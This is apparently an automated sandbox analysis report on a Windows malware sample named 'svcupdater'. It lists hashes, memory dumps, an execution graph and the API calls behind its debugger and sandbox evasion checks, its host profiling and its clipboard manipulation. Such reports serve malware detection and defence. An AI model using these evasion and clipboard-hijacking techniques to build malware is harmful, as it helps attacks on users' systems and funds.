                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 80371e12fd18c8b39a0bc1b1d7a752072202b45c717c1e3f2c7257ffb69a51d8
                                                                                                    • Instruction ID: ab26a69fcc76027fce7059d7db271c6b36aa64e50c7a6a4667c4b8aed7897c59
                                                                                                    • Opcode Fuzzy Hash: 80371e12fd18c8b39a0bc1b1d7a752072202b45c717c1e3f2c7257ffb69a51d8
                                                                                                    • Instruction Fuzzy Hash: 81B14362B5FBCA1FE76687A848752B07BE1EF53610B0A01FBD88DC71E3D9486805C342
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0d7708174ddc848875b007e5f3d42e279a4ae5e4f0d468bdc0db654f978a3b13
                                                                                                    • Instruction ID: c4191f671b699ebfff644d439a25ee6203e45577ed8f44ad8321c1073eea1d92
                                                                                                    • Opcode Fuzzy Hash: 0d7708174ddc848875b007e5f3d42e279a4ae5e4f0d468bdc0db654f978a3b13
                                                                                                    • Instruction Fuzzy Hash: 91417622B5EB890FD7569BBC98656717BE0DF56310B0901FFD488CB1E3D909A885C382
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2164841753.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 58ab08bbc210ae2c4394712dee00a5804f23766aff60b90c6f8678e38a642f1e
                                                                                                    • Instruction ID: 1b1334cfff86b8342ab62b21b29b81638050a758be624f8c24e973ce184b2c94
                                                                                                    • Opcode Fuzzy Hash: 58ab08bbc210ae2c4394712dee00a5804f23766aff60b90c6f8678e38a642f1e
                                                                                                    • Instruction Fuzzy Hash: FD31E87191CB4C4FDB19DB5C984A6E9BBE0FB59320F00426FE449D3262DA74A855CBC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2163613397.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b76d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a5d26b19c99b1fe0f0d52f3c0848e63f5cc4cdbddca0fd559fd5524247715a61
                                                                                                    • Instruction ID: 54ab527595d773d69215f5200e2bd9e7fb2f35e900ad68af805dceddfea494e5
                                                                                                    • Opcode Fuzzy Hash: a5d26b19c99b1fe0f0d52f3c0848e63f5cc4cdbddca0fd559fd5524247715a61
                                                                                                    • Instruction Fuzzy Hash: FE41F67140EBC48FE7569B2898559523FF0EF56220B1A06DFD088CB1B7D629AC46C7A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: daaf4f57258c4602093ee06fbd3dc41ac48ffb3ae4895f4edec5eeedc8fa6cdd
                                                                                                    • Instruction ID: 5f66cb8522a3729f8919a649768009a7231528bea308b2dca93a6d02225759b6
                                                                                                    • Opcode Fuzzy Hash: daaf4f57258c4602093ee06fbd3dc41ac48ffb3ae4895f4edec5eeedc8fa6cdd

Execution Graph

Execution Coverage: 8.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 960
Total number of Limit Nodes: 7
23547->23306 23549 be748f 23548->23549 23550 be74cb 23548->23550 23554 be72a0 23549->23554 23550->23311 23552 be74b7 23553 bfa477 71 API calls 23552->23553 23553->23550 23555 be72bd 23554->23555 23556 be735a 23554->23556 23555->23556 23562 be72c7 23555->23562 23557 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23556->23557 23558 be7367 23557->23558 23558->23552 23559 be7348 23560 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23559->23560 23561 be7356 23560->23561 23561->23552 23562->23559 23563 be72f6 23562->23563 23564 be7310 23562->23564 23563->23559 23566 be72fb 23563->23566 23565 be7331 23564->23565 23573 bfc72b 69 API calls ___std_exception_copy 23564->23573 23569 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23565->23569 23567 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23566->23567 23570 be730c 23567->23570 23572 be7344 23569->23572 23570->23552 23571 be732a 23571->23559 23571->23565 23572->23552 23573->23571 23576->23004 23577->23008 23578->23011 23579->23014 23581->23028 23584 be5f55 23583->23584 23586 be5f6e 23584->23586 23595 be82e0 43 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23584->23595 23589 be5fc6 23586->23589 23596 be8b80 67 API calls 7 library calls 23586->23596 23587 be3a20 43 API calls 23591 be6085 23587->23591 23589->23587 23590 be41f7 23590->23048 23591->23590 23597 be8410 43 API calls 23591->23597 23593->23047 23594->23057 23595->23586 23596->23589 23597->23590 23599 bf4400 std::locale::_Init 47 API calls 23598->23599 23600 be358c 23599->23600 23601 bed1c0 23600->23601 23602 bf421d std::_Lockit::_Lockit 7 API calls 23601->23602 23603 bed200 23602->23603 23604 bf421d std::_Lockit::_Lockit 7 API calls 23603->23604 23607 bed245 23603->23607 23605 bed225 23604->23605 23608 bf4275 std::_Lockit::~_Lockit 2 API calls 23605->23608 23606 bed264 23609 bf4275 std::_Lockit::~_Lockit 2 API calls 23606->23609 23607->23606 23711 bed980 67 API calls 8 library calls 23607->23711 
23608->23607 23610 bed276 23609->23610 23612 be8760 73 API calls 23610->23612 23614 bed281 23612->23614 23613 bed2d3 23616 bed2db 23613->23616 23617 bed300 23613->23617 23615 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23614->23615 23618 bed29f 23615->23618 23712 bf43ce 43 API calls std::_Facet_Register 23616->23712 23713 be33b0 43 API calls 2 library calls 23617->23713 23618->23062 23621 bed305 23623 bf4400 std::locale::_Init 47 API calls 23622->23623 23624 bed04a 23623->23624 23625 bf421d std::_Lockit::_Lockit 7 API calls 23624->23625 23626 bed061 23625->23626 23627 bf421d std::_Lockit::_Lockit 7 API calls 23626->23627 23631 bed0a3 23626->23631 23628 bed083 23627->23628 23632 bf4275 std::_Lockit::~_Lockit 2 API calls 23628->23632 23629 bed0c2 23630 bf4275 std::_Lockit::~_Lockit 2 API calls 23629->23630 23633 bed0d1 23630->23633 23631->23629 23714 bed980 67 API calls 8 library calls 23631->23714 23632->23631 23634 be8760 73 API calls 23633->23634 23637 bed0dc 23634->23637 23636 bed130 23638 bed15d 23636->23638 23639 bed138 23636->23639 23640 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23637->23640 23716 be33b0 43 API calls 2 library calls 23638->23716 23715 bf43ce 43 API calls std::_Facet_Register 23639->23715 23642 bea11f 23640->23642 23645 bed570 23642->23645 23644 bed162 23646 bed5a9 __fread_nolock 23645->23646 23647 bf53cc std::_Facet_Register 43 API calls 23646->23647 23648 bed5f9 23647->23648 23717 bedc60 23648->23717 23650 bed68d 23651 bed6c9 error_info_injector 23650->23651 23653 bed6f0 23650->23653 23652 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23651->23652 23654 bed6ea 23652->23654 23734 bf9dff 41 API calls 2 library calls 23653->23734 23654->23066 23661 be2613 23660->23661 23661->23661 23662 be2830 43 API calls 23661->23662 23663 be2625 23662->23663 23663->23068 23665 bed000 75 API calls 23664->23665 23666 becf68 23665->23666 23667 bed570 43 API calls 23666->23667 23668 becf8c 23667->23668 
23668->23070 23670 bed351 23669->23670 23671 bed366 23670->23671 23841 bedc20 75 API calls 23670->23841 23837 bed392 23671->23837 23676 bfdc54 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23675->23676 23676->23215 23678 be1dab __wsopen_s 23677->23678 23679 be2830 43 API calls 23678->23679 23680 be1ec8 23679->23680 23843 be2630 23680->23843 23682 be1ede 23684 bed000 75 API calls 23683->23684 23685 bed3fb 23684->23685 23686 bed570 43 API calls 23685->23686 23687 bed421 23686->23687 23687->23215 23689 be1f7b __wsopen_s 23688->23689 23690 be21c2 23689->23690 23691 be2001 23689->23691 23863 be1bd0 43 API calls 23690->23863 23692 be2a70 43 API calls 23691->23692 23694 be2030 23692->23694 23696 be2530 43 API calls 23694->23696 23695 be21c7 23864 bf9dff 41 API calls 2 library calls 23695->23864 23698 be2091 23696->23698 23700 be2760 43 API calls 23698->23700 23701 be20f6 23700->23701 23702 be2630 43 API calls 23701->23702 23703 be2109 error_info_injector 23702->23703 23703->23695 23704 be219e error_info_injector 23703->23704 23705 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23704->23705 23706 be21be 23705->23706 23706->23215 23707->23215 23708->23219 23709->23215 23710->23215 23711->23613 23712->23606 23713->23621 23714->23636 23715->23629 23716->23644 23718 bf53cc std::_Facet_Register 43 API calls 23717->23718 23719 bedca0 23718->23719 23735 bee3c0 23719->23735 23722 bedddf 23752 bee160 43 API calls 23722->23752 23724 bedd17 23725 bf53cc std::_Facet_Register 43 API calls 23724->23725 23726 bedd47 23725->23726 23751 bef320 43 API calls std::_Facet_Register 23726->23751 23732 beddac 23732->23650 23753 beee90 23735->23753 23738 bee402 23741 bf53cc std::_Facet_Register 43 API calls 23738->23741 23739 bedd09 23739->23722 23739->23724 23742 bee412 23741->23742 23745 bf53cc std::_Facet_Register 43 API calls 23742->23745 23743 bee3fa 23772 bee5f0 43 API calls std::_Facet_Register 23743->23772 23746 bee476 23745->23746 23746->23739 23747 beee90 43 API calls 
23746->23747 23749 bf53cc std::_Facet_Register 43 API calls 23746->23749 23773 bef320 43 API calls std::_Facet_Register 23746->23773 23774 bee5f0 43 API calls std::_Facet_Register 23746->23774 23747->23746 23749->23746 23751->23732 23754 bee3e1 23753->23754 23765 beeea3 23753->23765 23754->23738 23754->23739 23771 bef320 43 API calls std::_Facet_Register 23754->23771 23755 bef304 23809 bee160 43 API calls 23755->23809 23757 bef30b 23810 bee160 43 API calls 23757->23810 23760 bef320 43 API calls 23760->23765 23761 bef312 23811 bee160 43 API calls 23761->23811 23764 bef2fd 23808 bee160 43 API calls 23764->23808 23765->23754 23765->23755 23765->23757 23765->23760 23765->23761 23765->23764 23775 befe10 23765->23775 23804 befb60 43 API calls std::_Facet_Register 23765->23804 23805 befa30 43 API calls std::_Facet_Register 23765->23805 23806 befcb0 43 API calls 23765->23806 23807 bf0040 43 API calls 4 library calls 23765->23807 23771->23743 23772->23738 23773->23746 23774->23746 23777 befe2d 23775->23777 23781 befe36 23775->23781 23776 bf001a 23776->23765 23777->23776 23777->23781 23831 bf22f0 43 API calls 23777->23831 23780 beff5e 23782 bf0020 23780->23782 23789 beff69 23780->23789 23812 bf1b80 23781->23812 23833 bee160 43 API calls 23782->23833 23784 bf0027 23834 bee160 43 API calls 23784->23834 23785 bf002e 23835 bee160 43 API calls 23785->23835 23788 beff75 23788->23781 23788->23785 23789->23788 23832 bf22f0 43 API calls 23789->23832 23792 beffd8 23792->23784 23792->23788 23804->23765 23805->23765 23806->23765 23807->23765 23813 bf1b94 23812->23813 23816 bf1bb3 23812->23816 23813->23816 23836 bf0040 43 API calls 4 library calls 23813->23836 23815 bf1dac 23817 bf53cc std::_Facet_Register 43 API calls 23815->23817 23816->23815 23818 bf1bda 23816->23818 23820 bf1db3 23817->23820 23819 bf53cc std::_Facet_Register 43 API calls 23818->23819 23822 bf1be1 23819->23822 23821 bf53cc std::_Facet_Register 43 API calls 23820->23821 23830 bf1cf3 23821->23830 23823 bf53cc 
std::_Facet_Register 43 API calls 23822->23823 23824 bf1c1f 23823->23824 23825 bf53cc std::_Facet_Register 43 API calls 23824->23825 23826 bf1c6a 23825->23826 23827 bf53cc std::_Facet_Register 43 API calls 23826->23827 23828 bf1cb5 23827->23828 23829 bf53cc std::_Facet_Register 43 API calls 23828->23829 23829->23830 23830->23776 23831->23780 23832->23792 23836->23816 23838 bed377 23837->23838 23840 bed396 23837->23840 23838->23215 23840->23838 23842 bece50 41 API calls error_info_injector 23840->23842 23841->23670 23842->23840 23844 be265a 23843->23844 23845 be266e 23844->23845 23846 be2719 23844->23846 23847 be267a _Yarn 23845->23847 23849 be26a1 23845->23849 23852 be26dc 23845->23852 23853 be26e5 23845->23853 23860 be1bd0 43 API calls 23846->23860 23847->23682 23854 bf53cc std::_Facet_Register 43 API calls 23849->23854 23850 be271e 23861 be1b30 43 API calls 2 library calls 23850->23861 23852->23849 23852->23850 23857 bf53cc std::_Facet_Register 43 API calls 23853->23857 23859 be26bd _Yarn 23853->23859 23855 be26b4 23854->23855 23855->23859 23862 bf9dff 41 API calls 2 library calls 23855->23862 23857->23859 23859->23682 23861->23855 23865->23228 23866 c07baf 23871 c07985 23866->23871 23869 c07bee 23872 c079a4 23871->23872 23873 c079b7 23872->23873 23881 c079cc 23872->23881 23891 bfe7f3 14 API calls __dosmaperr 23873->23891 23875 c079bc 23892 bf9def 41 API calls ___std_exception_copy 23875->23892 23877 c079c7 23877->23869 23888 c104b7 23877->23888 23879 c07b9d 23897 bf9def 41 API calls ___std_exception_copy 23879->23897 23886 c07aec 23881->23886 23893 c0fd49 41 API calls 2 library calls 23881->23893 23883 c07b3c 23883->23886 23894 c0fd49 41 API calls 2 library calls 23883->23894 23885 c07b5a 23885->23886 23895 c0fd49 41 API calls 2 library calls 23885->23895 23886->23877 23896 bfe7f3 14 API calls __dosmaperr 23886->23896 23898 c0fe81 23888->23898 23891->23875 23892->23877 23893->23883 23894->23885 23895->23886 23896->23879 23897->23877 23900 c0fe8d 
__FrameHandler3::FrameUnwindToState 23898->23900 23899 c0fe94 23918 bfe7f3 14 API calls __dosmaperr 23899->23918 23900->23899 23902 c0febf 23900->23902 23909 c10449 23902->23909 23903 c0fe99 23919 bf9def 41 API calls ___std_exception_copy 23903->23919 23908 c0fea3 23908->23869 23921 c09d4a 23909->23921 23914 c1047f 23917 c0fee3 23914->23917 23975 c03705 14 API calls __dosmaperr 23914->23975 23920 c0ff16 LeaveCriticalSection __wsopen_s 23917->23920 23918->23903 23919->23908 23920->23908 23976 bfe806 23921->23976 23925 c09d6e 23926 bff13d 23925->23926 23988 bfefc9 23926->23988 23929 c104d7 23930 c104f4 23929->23930 23931 c10522 23930->23931 23932 c10509 23930->23932 24013 c0b512 23931->24013 24027 bfe7e0 14 API calls __dosmaperr 23932->24027 23936 c10530 24029 bfe7e0 14 API calls __dosmaperr 23936->24029 23937 c10547 24026 c10190 CreateFileW 23937->24026 23941 c10535 24030 bfe7f3 14 API calls __dosmaperr 23941->24030 23942 c1051b 23942->23914 23944 c105fd GetFileType 23947 c10608 GetLastError 23944->23947 23948 c1064f 23944->23948 23945 c1050e 24028 bfe7f3 14 API calls __dosmaperr 23945->24028 23946 c105d2 GetLastError 24032 bfe799 14 API calls __dosmaperr 23946->24032 24033 bfe799 14 API calls __dosmaperr 23947->24033 24035 c0b45d 15 API calls 2 library calls 23948->24035 23950 c10580 23950->23944 23950->23946 24031 c10190 CreateFileW 23950->24031 23952 c10616 CloseHandle 23952->23945 23954 c1063f 23952->23954 24034 bfe7f3 14 API calls __dosmaperr 23954->24034 23956 c105c5 23956->23944 23956->23946 23958 c10670 23960 c106bc 23958->23960 24036 c1039f 75 API calls 3 library calls 23958->24036 23959 c10644 23959->23945 23964 c106c3 23960->23964 24038 c0ff42 75 API calls 4 library calls 23960->24038 23963 c106f1 23963->23964 23965 c106ff 23963->23965 24037 c03873 44 API calls 2 library calls 23964->24037 23965->23942 23967 c1077b CloseHandle 23965->23967 24039 c10190 CreateFileW 23967->24039 23969 c107a6 23970 c107b0 GetLastError 23969->23970 23971 c107dc 23969->23971 
24040 bfe799 14 API calls __dosmaperr 23970->24040 23971->23942 23973 c107bc 24041 c0b625 15 API calls 2 library calls 23973->24041 23975->23917 23977 bfe824 23976->23977 23983 bfe81d 23976->23983 23977->23983 23985 c02340 41 API calls 3 library calls 23977->23985 23979 bfe845 23986 c03b37 41 API calls __Strxfrm 23979->23986 23981 bfe85b 23987 c03b95 41 API calls __wsopen_s 23981->23987 23983->23925 23984 c05012 5 API calls std::_Locinfo::_Locinfo_dtor 23983->23984 23984->23925 23985->23979 23986->23981 23987->23983 23989 bfefd7 23988->23989 23990 bfeff1 23988->23990 24006 bff17e 14 API calls ___free_lconv_mon 23989->24006 23992 bfeff8 23990->23992 23993 bff017 23990->23993 24005 bfefe1 23992->24005 24007 bff1bf 15 API calls __wsopen_s 23992->24007 24008 c09a65 MultiByteToWideChar 23993->24008 23996 bff026 23997 bff02d GetLastError 23996->23997 23999 bff053 23996->23999 24011 bff1bf 15 API calls __wsopen_s 23996->24011 24009 bfe799 14 API calls __dosmaperr 23997->24009 23999->24005 24012 c09a65 MultiByteToWideChar 23999->24012 24001 bff039 24010 bfe7f3 14 API calls __dosmaperr 24001->24010 24003 bff06a 24003->23997 24003->24005 24005->23914 24005->23929 24006->24005 24007->24005 24008->23996 24009->24001 24010->24005 24011->23999 24012->24003 24014 c0b51e __FrameHandler3::FrameUnwindToState 24013->24014 24042 bfdd02 EnterCriticalSection 24014->24042 24016 c0b54a 24046 c0b2ec 15 API calls 3 library calls 24016->24046 24017 c0b525 24017->24016 24022 c0b5b9 EnterCriticalSection 24017->24022 24025 c0b56c 24017->24025 24021 c0b54f 24021->24025 24047 c0b43a EnterCriticalSection 24021->24047 24023 c0b5c6 LeaveCriticalSection 24022->24023 24022->24025 24023->24017 24043 c0b61c 24025->24043 24026->23950 24027->23945 24028->23942 24029->23941 24030->23945 24031->23956 24032->23945 24033->23952 24034->23959 24035->23958 24036->23960 24037->23942 24038->23963 24039->23969 24040->23973 24041->23971 24042->24017 24048 bfdd4a LeaveCriticalSection 24043->24048 24045 c0b58c 
24045->23936 24045->23937 24046->24021 24047->24025 24048->24045
                                                                                                    APIs
                                                                                                      • Part of subcall function 00BE3560: std::locale::_Init.LIBCPMT ref: 00BE3587
                                                                                                      • Part of subcall function 00BED1C0: std::_Lockit::_Lockit.LIBCPMT ref: 00BED1FB
                                                                                                      • Part of subcall function 00BED1C0: std::_Lockit::_Lockit.LIBCPMT ref: 00BED220
                                                                                                      • Part of subcall function 00BED1C0: std::_Lockit::~_Lockit.LIBCPMT ref: 00BED240
                                                                                                      • Part of subcall function 00BED1C0: std::_Lockit::~_Lockit.LIBCPMT ref: 00BED271
                                                                                                    • Sleep.KERNELBASE(00000032,00000001,2F4C7F60,?,00000033), ref: 00BECC39
                                                                                                      • Part of subcall function 00BE2B90: OpenClipboard.USER32(00000000), ref: 00BE2B98
                                                                                                      • Part of subcall function 00BE2B90: EmptyClipboard.USER32 ref: 00BE2BA6
                                                                                                      • Part of subcall function 00BE2B90: CloseClipboard.USER32 ref: 00BE2BB0
                                                                                                      • Part of subcall function 00BE2B90: GlobalAlloc.KERNEL32(00002000,?), ref: 00BE2BC5
                                                                                                      • Part of subcall function 00BE2B90: CloseClipboard.USER32 ref: 00BE2BD1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                      • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                      • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                      • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                      • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardLockitstd::_$CloseLockit::_Lockit::~_$AllocEmptyGlobalInitOpenSleepstd::locale::_
                                                                                                    • String ID: i/o$" yx$$ypp$%k2$&$&h1$&|u$(,a8$)5!E$*d=$+?[}$1%Ag$3$55{"$7~8x$:(xv$<$<X~6$=x!$>C4^$>vw8$AOFG$D$JBV^$Mk#($QkAx$SWT2$V+\6$VH5B$WGD$\$\ACE$`;qi$`<l2$a$c++e$d$e[`$f$m4$n2k$o1-$p?O$r497$reid$rv;b$u$u$u,$w+{%$x#-#$x&:$y $y{{=$}qb1
                                                                                                    • API String ID: 769801142-2535262029
                                                                                                    • Opcode ID: ba8a71fb7293191a02dc96bd216266deb66eeb7c609a9715a25af8e80ddefb51
                                                                                                    • Instruction ID: 5e5e39d44ce6d251120d1f9cb211f4740891c1625be37bd9d9bca3a8976fe35c
                                                                                                    • Opcode Fuzzy Hash: ba8a71fb7293191a02dc96bd216266deb66eeb7c609a9715a25af8e80ddefb51
                                                                                                    • Instruction Fuzzy Hash: EB538A31C096E899DB25DB648C51BFEBBB1AF2A305F0441C9E58D26183EB742BC9CF15

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph: basic-block and edge listing for the function starting at be46e0 (blocks be46e0-be508b; graphical rendering omitted, called APIs are listed under APIs below)
                                                                                                    APIs
                                                                                                      • Part of subcall function 00BE3B60: GetSystemInfo.KERNELBASE(?), ref: 00BE3B7F
                                                                                                      • Part of subcall function 00BE3B60: GlobalMemoryStatusEx.KERNELBASE(?), ref: 00BE3BA0
                                                                                                      • Part of subcall function 00BE3B60: CreateFileA.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00BE3BF6
                                                                                                      • Part of subcall function 00BE3B60: DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00BE3C14
                                                                                                      • Part of subcall function 00BE3B60: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE3C47
                                                                                                      • Part of subcall function 00BE3F90: IsDebuggerPresent.KERNEL32(2F4C7F60,?,00000044), ref: 00BE3FBA
                                                                                                      • Part of subcall function 00BE3F90: GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00BE3FE7
                                                                                                      • Part of subcall function 00BE3F90: GetProcAddress.KERNEL32(00000000), ref: 00BE3FEE
                                                                                                      • Part of subcall function 00BE3F90: GetTickCount64.KERNEL32 ref: 00BE3FFA
                                                                                                      • Part of subcall function 00BE3F90: NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00BE4016
                                                                                                      • Part of subcall function 00BE3F90: GetTickCount64.KERNEL32 ref: 00BE4018
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,2F4C7F60), ref: 00BE4736
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00BE4CC0
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00BE4D03
                                                                                                    • GetUserNameA.ADVAPI32(?,000000FF), ref: 00BE4D17
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                      • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                      • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                      • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                      • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Count64FileModuleTick$AddressComputerControlCreateDebuggerDelayDeviceExecutionFolderGlobalHandleInfoMemoryPathPresentProcStatusSystemUnothrow_t@std@@@User__ehfuncinfo$??2@
                                                                                                    • String ID: 724471\\user$P$Win32Sync$svcupdater
                                                                                                    • API String ID: 3481597238-1650623006
                                                                                                    • Opcode ID: c4b72d3307c9bd84db379060f8e619632726ed3073bcf358432f94d05416832c
                                                                                                    • Instruction ID: 4528c65f44238279ee55ff88f66fc4d4d74971b3b49c7c8d513e104f612dd2f8
                                                                                                    • Opcode Fuzzy Hash: c4b72d3307c9bd84db379060f8e619632726ed3073bcf358432f94d05416832c
                                                                                                    • Instruction Fuzzy Hash: A84216B19001988BDB29CB28CC987EEB7B5AF51304F5482D8E24967683D7706FC9CF95

                                                                                                     Control-flow Graph (basic blocks as start-end addresses with the APIs they call; a->b is an edge)
                                                                                                     control_flow_graph 1162 be3f90-be3fc2 IsDebuggerPresent 1163 be4029 1162->1163 1164 be3fc4-be3fcb call be3d10 1162->1164 1166 be402b-be4045 call bf53be 1163->1166 1164->1163 1169 be3fcd-be3fd4 call be3c80 1164->1169 1169->1163 1173 be3fd6-be3ff8 GetModuleHandleW GetProcAddress 1169->1173 1174 be3ffa-be4023 GetTickCount64 NtDelayExecution GetTickCount64 1173->1174 1175 be4025-be4027 1173->1175 1174->1163 1174->1175 1175->1166
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(2F4C7F60,?,00000044), ref: 00BE3FBA
                                                                                                      • Part of subcall function 00BE3F90: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,2F4C7F60), ref: 00BE3D42
                                                                                                      • Part of subcall function 00BE3F90: Process32FirstW.KERNEL32(00000000,?), ref: 00BE3D6B
                                                                                                      • Part of subcall function 00BE3F90: Process32NextW.KERNEL32(00000000,0000022C), ref: 00BE3D81
                                                                                                      • Part of subcall function 00BE3C80: CloseHandle.KERNELBASE(DEADBEEF,2F4C7F60), ref: 00BE3CBF
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00BE3FE7
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00BE3FEE
                                                                                                    • GetTickCount64.KERNEL32 ref: 00BE3FFA
                                                                                                    • NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00BE4016
                                                                                                    • GetTickCount64.KERNEL32 ref: 00BE4018
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                     • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Count64HandleProcess32Tick$AddressCloseCreateDebuggerDelayExecutionFirstModuleNextPresentProcSnapshotToolhelp32
                                                                                                    • String ID: NtDelayExecution$ntdll.dll
                                                                                                    • API String ID: 2350081285-521143355
                                                                                                    • Opcode ID: 22e69068800b542bbd0f71dfc411ff36097066820e44780964d24fa971513191
                                                                                                    • Instruction ID: 7aae243974b8d3d1ca0d7f29528926ebd444e92ff612357d598bed8bf94bbbf6
                                                                                                    • Opcode Fuzzy Hash: 22e69068800b542bbd0f71dfc411ff36097066820e44780964d24fa971513191
                                                                                                    • Instruction Fuzzy Hash: 1F110671A00789EFDB109FE5EC49BAE77F8FF49711F1009B9EA12D3282DB3485048694

                                                                                                     Control-flow Graph (basic blocks as start-end addresses with the APIs they call; a->b is an edge)
